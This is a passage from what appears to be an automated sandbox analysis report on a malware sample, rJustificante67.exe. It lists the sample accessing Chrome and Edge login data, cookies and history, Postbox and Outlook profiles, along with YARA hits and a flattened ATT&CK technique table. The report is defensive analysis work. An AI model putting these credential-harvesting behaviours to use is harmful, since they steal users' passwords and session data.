            Source: C:\Users\user\Desktop\rJustificante67.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_00405EC4 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405EC4
            Source: C:\Users\user\Desktop\rJustificante67.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rJustificante67.exe PID: 6776, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\rJustificante67.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: 00000003.00000002.3926681535.0000000032F1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rJustificante67.exe PID: 6776, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rJustificante67.exe PID: 6776, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            11
            Process Injection
            11
            Masquerading
            1
            OS Credential Dumping
            211
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory1
            Process Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
            Virtualization/Sandbox Evasion
            Security Account Manager41
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares1
            Data from Local System
            3
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            4
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets13
            File and Directory Discovery
            SSHKeylogging15
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.